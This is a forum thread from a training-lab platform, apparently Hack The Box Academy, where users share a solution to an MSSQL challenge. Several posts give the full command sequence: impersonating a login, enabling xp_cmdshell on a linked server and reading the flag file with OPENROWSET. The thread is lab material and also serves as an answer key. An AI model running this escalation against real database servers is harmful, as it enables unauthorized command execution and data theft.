Attacking Common Services - Hard

Neverakswhy · February 1, 2023, 1:16pm

Finally completed
–>user and pass
–>login to rdp using remmina and use sqlcmd command (or) use sqsh from local machine
–>impersonate user
–>search more databases
–>check users priv on other databases
→ be carefully this is very hard if you won’t understand mssql commands
–>research about xp_cmdshell
–>you need to enable on other database using execute command be very carefull about command you give
–>use chatgpt. ask how to enable on other database from our database

NeverGive Up All the Best

ishsome · February 8, 2023, 12:56am

After impersonating as John, do we have to connect to the linked server or just execute commands from the current MSSQL server?

I am not able to enable xp_cmdshell with or without connecting to the linked server.

Can you please provide a little nudge here?

**

Update: I was able to figure it out.

**

Luv2Hack · February 8, 2023, 2:28pm

Were you able to get the xp_cmdshell method to work? I had to do this an alternate way.

If you did use the xp_cmdshell can you PM me the steps you took? I am happy to share the method I used.

Neverakswhy · February 9, 2023, 12:24pm

Hey No Worries My Fnd

These Are The Commands This Will Enable XP_CMDSHELL

But Keep In Mind That You Need To Enable On Other Database So We Need To Modify Commands As We Are Executing On Other Database

Your Command Will Be Like This
EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure 'show advanced options', 1;

Don’t Forget TO Reconfigure On that Database
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV];

Luv2Hack · February 10, 2023, 4:21pm

Thanks NeverAskWhy. I am going to try this one again using this method. I couldn’t figure out the syntax to get this to work. I appreciate the help.

J4rvis · February 15, 2023, 10:18am

Uhm am i missing something? I impersonated the j user but i have no sysadmin privileges to continue

UPDATE: got it!

StormBreaker11 · February 15, 2023, 2:57pm

@J4rvis @johnnyvims Could you please help me, I can’t find a way to enable the xp_cmdshell after impersonating J… I need clear step-by-step advice, I have tried a lot of different methods described by HTB Academy but it doesn’t seem to work so I am not making any progress. I have read all the comments in this forum and sometimes get ideas but still can’t figure it out …

J4rvis · February 15, 2023, 3:11pm

@StormBreaker11 after impersonating, u gotta follow the steps that @Neverakswhy posted 6 days ago. what u need to do is basically trigger the xp_cmdshell not in the local db you’in, but sending queries to the linked db (that local.test.linked.srv). understand the syntax to send commands to that linked db (neveraskswhy user posted them), and first start by configuring advanced options, then reconfigure it, then once u’ve done that u just have to do the same configuring xp_cmdshell.
after that, u can directly use xp_cmdshell to send cmd commands to that db and get the flag. make sure to use the correct syntax for xp_cmdshell. scroll above in here and there’s a screen of the user “Newuser” of 29days ago suggesting u the syntax, u just gotta correct that.
cheers!

StormBreaker11 · February 15, 2023, 3:34pm

@J4rvis Thanks for your quick reply, I have done exactly what @Neveraskswhy stated 6 days ago but after impersonating as J… and following Neveraskswhy advice, I am still getting the following issue:

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure ‘show advanced options’, 1
2> go
Configuration option ‘show advanced options’ changed from 1 to 1. Run the RECONFIGURE statement to install.
1> EXEC (‘RECONFIGURE’) AT [LOCAL.TEST.LINKED.SRV]
2> EXEC sp_configure ‘show advanced options’, 1;
3> go
Msg 15247, Level 16, State 1
Server ‘WIN-HARD\SQLEXPRESS’, Procedure ‘sp_configure’, Line 105
User does not have permission to perform this action.

What am I doing wrong?

I appreciate all your help.

sWEEDexploit · February 15, 2023, 9:51pm

you are close.
you have to figure out the name of the sysadmin at the Linked Database.
you can execute commands on the other database with a command formated like this:
EXECUTE(’ your command ‘) AT [LOCAL…]
inside this command you can also put the impersonating command you have learned.
Also you can do more commands at once. You just have to put a semicolon between each of them like:
EXECUTE(’ first command ; second command’) AT [LOCAL…]

if you have a command conatining a ’ you need to add another ’ to it. (‘’)

suryateja · February 22, 2023, 2:40pm

I have made it simple:

Obtain the password from smbshare.

Log into the rdp session using found credentials.

impersonate using sqlcmd after establishing a session.

EXECUTE(“SELECT * FROM OPENROWSET(BULK N’C:/Users/Administrator/Desktop/flag.txt’, SINGLE_CLOB) AS Contents”) AT [LOCAL.TEST.LINKED.SRV]

Happy Hacking.

TATAREN · February 24, 2023, 12:38pm

Thanks @suryateja i did manage to understand your point and made it after a lot of tries.
because i was facing syntax error.
after you follow @suryateja steps try this command

EXECUTE("SELECT * FROM OPENROWSET(BULK N'C:/Users/Administrator/Desktop/flag.txt', SINGLE_CLOB) AS Contents") AT [LOCAL.TEST.LINKED.SRV]

ssh25621 · February 25, 2023, 9:42am

guys how did you manage to enable xp_cmdshell, I did it using BULK, However I have no clue how it can be done with xp_cmdshell, like how? I have done it tried multiple ways, but still keep getting error, ant help would be appreciated. thanks in advance

gizmoe380 · February 26, 2023, 4:24am

thank you @everyone for your help you guys are awesome!!

tolisvs7 · February 26, 2023, 5:10pm

Guys I found the password of the user f**** and I could connected with RDP on the target machine.However I couldn’t access on the mssql database from the RDP (SQL Server Management Studio) and mssqlclient.py…
Could you please help with any hint regarding how to connect on the database? Maybe I need to use another password for f*** user?

THank you

wfsahuo3 · March 9, 2023, 6:40pm

This is a terrible lab. I took me a long time, so to help anyone out:

EXECUTE AS LOGIN = ‘john’
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER(‘sysadmin’)
GO
EXECUTE(‘sp_configure ‘‘show advanced options’’, 1’) AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE(‘RECONFIGURE’) AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE(‘EXECUTE sp_configure ‘‘xp_cmdshell’’, 1’) AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE(‘RECONFIGURE’) AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE(‘SELECT * FROM OPENROWSET(BULK N’‘C:/Users/Administrator/Desktop/flag.txt’‘, SINGLE_CLOB) AS Contents’) AT [LOCAL.TEST.LINKED.SRV]
GO

splinter · March 15, 2023, 10:00pm

Thank you @wfsahuo3 !

This is so helpful. and “duh!” realized the flag is on the local server not the linked remote server. I am curious where you got the syntax which is what must have taken you so long! All those quotes/double quotes!

wfsahuo3 · March 16, 2023, 10:14am

No worries, glad i could help. Yeah, i think this lab was absolutely terrible. Especially because the “example” that’s provided isn’t helpful at all. I took me a long time to figure out the positioning of all the quotes, it was basically a lot of trial and error. But remember you can use this syntax in the future to run other commands on the linked server as well.

lancedelacroix · March 19, 2023, 8:42am

I was a bit perplexed here too, but figured it out - you don’t get a “greeting” message when you connect successfully. You just get a prompt for your query “1>”.

Once logged in as Fiona through RDP, you can just run sqlcmd -H localhost in Powershell, and you get a db session :).